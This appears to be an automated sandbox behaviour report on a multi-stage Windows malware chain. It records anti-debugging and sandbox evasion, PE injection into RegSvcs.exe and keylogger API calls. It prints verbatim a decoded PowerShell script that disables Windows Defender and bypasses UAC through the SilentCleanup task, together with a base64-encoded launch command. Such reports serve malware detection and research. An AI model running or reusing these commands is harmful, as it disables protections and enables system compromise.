Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2066865067.0000000000C12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: powershell.exe, 00000013.00000002.3089623056.0000000006E13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}nvalW
Source: file.exe, 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmp, H3tyh96.exe, 00000007.00000002.3299916766.000000000054F000.00000040.00000001.01000000.0000000A.sdmp, 75f24a4b40.exe, 00000008.00000002.3253907204.0000000000AD4000.00000040.00000001.01000000.0000000C.sdmp, 9e4b3ff3c2.exe, 0000001B.00000002.3085649699.0000000000B26000.00000040.00000001.01000000.00000012.sdmp, 75f24a4b40.exe, 00000030.00000002.3307675118.0000000000AD4000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04BC01B4 rdtsc

0_2_04BC01B4

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B652B mov eax, dword ptr fs:[00000030h]	0_2_003B652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003BA302 mov eax, dword ptr fs:[00000030h]	0_2_003BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002BA302 mov eax, dword ptr fs:[00000030h]	2_2_002BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_002B652B mov eax, dword ptr fs:[00000030h]	2_2_002B652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002BA302 mov eax, dword ptr fs:[00000030h]	3_2_002BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_002B652B mov eax, dword ptr fs:[00000030h]	3_2_002B652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002BA302 mov eax, dword ptr fs:[00000030h]	6_2_002BA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_002B652B mov eax, dword ptr fs:[00000030h]	6_2_002B652B

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 9e4b3ff3c2.exe PID: 408, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: ClientAny.exe.7.dr, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: ClientAny.exe.7.dr, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: ClientAny.exe.7.dr, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: 7.2.H3tyh96.exe.9340000.14.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 7.2.H3tyh96.exe.9340000.14.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 7.2.H3tyh96.exe.9340000.14.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 7.2.H3tyh96.exe.9340000.14.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 7.2.H3tyh96.exe.9340000.14.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"'

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like 'TOGGLE') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0\|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'1-5-32-544'){$u=1};if($w-like'1-16-12288'){$u=2};if($w-like'1-16-16384'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 416000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 692008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe "C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe "C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe "C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe "C:\Users\user\AppData\Local\Temp\1013678001\ae44c30d83.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\ClientAny.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA	Jump to behavior
